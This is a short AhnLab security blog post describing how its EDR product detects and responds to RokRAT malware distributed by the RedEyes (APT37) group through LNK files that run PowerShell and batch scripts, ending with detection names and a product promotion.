AhnLab EDR Tracks and Responds against Link File (*.lnk) Distributing RokRAT

AhnLab Security Emergency response Center (ASEC) has shared information regarding the RedEyes threat group (also known as APT37, ScarCruft), who distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month.

RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)

The LNK file contains a PowerShell command and performs malicious behavior without the knowledge of the individual who uses the normal pdf file by creating and executing script files along with normal files in the temp path.

If a malicious LNK file is injected into a user’s system and executed, then AhnLab EDR detects the suspicious execution of a PowerShell command in the following way:

Clicking on cmd.exe in the figure shown above displays the execution history of the .bat file and the command it contains, as shown below.

If the suspicious execution of a Porshell.exe command via a batch (.bat) file is detected, the user can identify the system and individual that logged in to execute the command by checking the host information on the top right corner.

As shown in the figure below, it is possible to confirm the download URL used to install additional malware if the PC in question is investigated further.

If suspicious logs are confirmed, managers can respond through EDR’s features that allow them to terminate processes and quarantine the network of the system in question.

RokRAT has been continuously distributed since the past, and as shown in the case above, it also executes a normal file, making it difficult for users to detect the infection. EDR products that are also capable of detecting and responding to suspicious behavior are required to handle malware as they continue to evolve.

 [File Detection]
Dropper/LNK.Agent (2023.04.08.00)
Downloader/BAT.Agent (2023.04.08.00)

To learn more about AhnLab EDR's advanced behavior-based detection and reponse, please click the banner below